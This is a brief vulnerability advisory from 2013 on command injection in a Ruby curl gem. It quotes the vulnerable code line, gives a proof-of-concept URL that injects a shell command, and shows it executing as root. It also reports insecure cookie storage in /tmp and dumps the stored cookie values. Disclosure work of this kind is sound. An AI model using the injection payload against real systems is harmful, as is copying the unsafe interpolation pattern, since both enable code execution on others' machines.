Curl Ruby Gem Remote command execution 3/12/2013 https://github.com/tg0/curl Specially crafted URLs can result in remote code execution: In ./lib/curl.rb the following lines: 131 cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref} \"{url}\" " 132 if @debug 133 puts cmd.red 134 end 135 result = open_pipe(cmd) PoC page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"") larry@underfl0w:/tmp$ cat p uid=0(root) gid=0(root) groups=0(root) Larry W. Cashdollar @_larry0 http://vapid.dhs.org This gem also stores cookie data insecurely in /tmp: root@underfl0w:/tmp# ls -ld curl drwxr-xr-x 2 root root 4096 Mar 12 18:35 curl root@underfl0w:/tmp# ls -ld /tmp/curl drwxr-xr-x 2 root root 4096 Mar 12 18:35 /tmp/curl root@underfl0w:/tmp# ls -la curl/curl_0.* -rw-r--r-- 1 root root 428 Mar 12 18:44 curl/curl_0.287351232063069_0.217269869500322.jar -rw-r--r-- 1 root root 428 Mar 12 18:25 curl/curl_0.564885403765839_0.0415036222928075.jar root@underfl0w:/tmp# cat /tmp/curl/curl_0.* # Netscape HTTP Cookie File # http://curl.haxx.se/rfc/cookie_spec.html # This file was generated by libcurl! Edit at your own risk. .google.com TRUE / FALSE 1426199640 PREF ID=c637a1a53176d2bd:FF=0:TM=1363127640:LM=1363127640:S=XG_kBQswSvKUKY5m #HttpOnly_.google.com TRUE / FALSE 1378938840 NID 67=kOUx2FhV6OQ6MSybmqD5vZMSI3gH8jB22AC4ReeIoqZHbao8zkejJncER8YznFgSVes6_MfqBJpgyPdR1snw3POtLL1Nr96RsQqHcdv6v6rkSmj_Z2XmVakZ95Rt1wMC # Netscape HTTP Cookie File # http://curl.haxx.se/rfc/cookie_spec.html # This file was generated by libcurl! Edit at your own risk. .google.com TRUE / FALSE 1426198990 PREF ID=ca381d47b3f5aec2:FF=0:TM=1363126990:LM=1363126990:S=HrBfHkxDYMih4kfC #HttpOnly_.google.com TRUE / FALSE 1378938190 NID 67=ozR4v4tBjG9kUmFshdYLu7h0Z_fyXBpTrABHtlJYbEpkB1czXMKEGa_S5t3rMBbunYIeEaguy3l1fOkfWqFni_ajjxipoyNK4taRefp977i7yV_xc4GIEtP-OQuRCydF root@underfl0w:/tmp#